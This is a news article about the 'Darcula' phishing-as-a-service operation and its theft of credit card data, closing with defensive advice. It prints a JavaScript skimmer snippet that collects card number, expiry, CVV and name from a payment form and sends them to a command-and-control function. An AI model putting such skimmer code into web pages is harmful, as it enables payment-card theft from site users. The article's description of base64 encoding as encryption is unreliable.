Security researchers have uncovered one of the largest credit card theft operations in recent history, with a sophisticated Phishing-as-a-Service (PhaaS) platform called “Darcula” responsible for stealing approximately 884,000 credit card details through a massive campaign that generated over 13 million clicks from unsuspecting users worldwide.

The operation, which began in late 2024, has targeted consumers across 32 countries, with the highest concentration of victims in North America and Europe.

Security experts estimate the financial damage could exceed $150 million based on current dark web values for stolen financial data.

The Darcula platform distinguishes itself from typical phishing operations through its advanced infrastructure and subscription-based model, allowing even low-skilled cybercriminals to launch sophisticated attacks.

The service provides customers with convincing replicas of banking websites, e-commerce platforms, and payment portals, complete with realistic SSL certificates and domain names designed to evade detection.

Most concerning is Darcula’s ability to bypass multi-factor authentication through real-time session hijacking techniques that intercept and relay authentication codes.

The massive campaign’s success stems from its multi-channel approach, delivering malicious links through email, SMS, social media messaging, and compromised advertising networks.

Victims typically receive urgent messages claiming issues with their accounts or purchases, directing them to fraudulent sites that capture their credentials and payment information.

The operation’s scale suggests a well-organized cybercriminal syndicate with significant resources and technical expertise behind it.

Mnemonic analysts identified the Darcula operation in February 2025 after tracing a pattern of credit card theft reported by financial institutions.

The researchers discovered a command-and-control infrastructure spanning multiple countries, with primary servers located in Eastern Europe and Southeast Asia.

“What makes Darcula particularly dangerous is its modular architecture and constant evolution,” explained Dr.

Elena Vasquez, lead cybersecurity researcher at Mnemonic. “The operators continuously update their techniques to evade detection.”

The most sophisticated aspect of Darcula is its advanced infection mechanism, which employs a multi-stage payload delivery system to evade security solutions.

Initial access

Initial access begins with seemingly innocuous JavaScript code embedded in fake payment pages:-

function validateInput() {
  // Legitimate-looking form validation
  collectCardData();
  // Hidden function that executes the actual theft
  setTimeout(function() {
    let exfiltrationPayload = {
      cardNum: document.getElementById('ccnumber').value,
      expDate: document.getElementById('expdate').value,
      cvv: document.getElementById('cvv').value,
      name: document.getElementById('cardholder').value
    };
    sendToC2(btoa(JSON.stringify(exfiltrationPayload)));
  }, 500);
  return true;
}

When users enter their information into these convincing forgeries, the JavaScript captures the data and encrypts it before transmission to intermediate servers.

These servers, often compromised legitimate websites, relay the information through a series of proxies before reaching Darcula’s secure storage infrastructure.

This multi-hop architecture makes attribution extremely difficult for law enforcement.

Financial institutions and cybersecurity companies have formed a joint task force to combat the Darcula threat.

They recommend organizations implement advanced phishing detection systems and conduct regular security awareness training for employees and customers.

Individuals should verify website authenticity through official channels before entering sensitive information and enable transaction notifications to quickly identify unauthorized charges.

Law enforcement agencies across multiple jurisdictions are coordinating efforts to track down the Darcula operators, though they acknowledge the sophisticated nature of the operation presents significant challenges to attribution and prosecution.

Are you from the SOC and DFIR Teams? – Analyse Real time Malware Incidents with ANY.RUN -> Start Now for Free.